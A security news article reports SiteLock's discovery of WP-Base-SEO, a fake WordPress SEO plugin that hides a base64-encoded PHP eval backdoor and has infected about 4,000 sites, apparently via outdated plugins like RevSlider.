Malware software masquerading as an SEO plugin called WP-Base-SEO has infected close to 4,000 WordPress sites in the last two week, according to security experts. The attempt to install these plugins which act as a legitimate SEO tool for use by the WordPress Site while creating a backdoor to the targeted WordPress account.
“They have copied the code from an existing SEO plugin, which has been tweaked to work for them. So when an SEO expert comes in and pokes through the code then it will look legitimate SEO plugin,” said Weston Henry, lead security analyst at security firm SiteLock, that found the fake SEO plugins. The WP-Base-SEO is a bogus SEO tool which has been created as a forgery of a legitimate search engine optimization plugin, WordPress SEO tools.
The way this software is being installed on WordPress is through mass scanning of the WordPress sites where the attackers are looking for outdated plugins or WordPress themes, Henry said. A disproportionate number of infections have been found on WordPress websites which are running an outdated version of the WordPress slideshow plugin called RevSlider.
RevSlider is an outdated plugin which has been linked to various high-profile WordPress compromises in the last several years. In April 2016, RevSlider was the reason behind and blamed for the leak of the Panama Papers which was a 2.5 Terabyte data leak. In July, malicious attackers tried installing on WordPress sites which included RevSlider, planting the Neutrino Exploit Kit on WebPages that attempted to install CryptXXX ransomware on visitors.
“We think that RevSlider is just in the mix when it comes to vulnerabilities and attack adversaries are trying to exploit. It could also be they are using stolen credentials by using the brute-force password attacks against these sites,” Henry said.
A closer examination of the WP-Base-SEO software see the malicious intent by encoding base-64 encoded PHP eval request, according to the technical blog that examines the plugin, “Eval is a PHP function that executes arbitrary PHP code. It is commonly used for malicious purposes and php.net recommends against using it,” SiteLock said.
Content which was malicious was found in /wp-content/plugins/wp-base-seo/wp-seo-main.php. “At first glance, the code looks legitimate including a reference to the WordPress plugin database and documentation on how the plugin works,” according to the SiteLock.
Researchers focused on two files located in the malicious WP-Base-SEO plugin directory.
“wp-seo.php, which includes the require_once for the second file, wp-seo-main.php. Wp-seo-main.php uses different function and variables names depending on the install, like wpseotools_on_activate_blog vs. bas_wpseo_on_activate_blog, and wp_base vs. base_wp_base,” wrote researchers.
“This means that anything the theme can be loaded in a browser, the request in initialized,” SiteLock said.
According to SiteLock experts, the obsfuscation fake technique has been successful, up until this point. While checking the past infections of WP-Base-SEO plugins, SiteLock said that this plugin has flown under the radar as a malware until now. “This highlights the critical need for web application security, including a malware scanner that can identify vulnerabilities and automatically remove malware,” SiteLock wrote.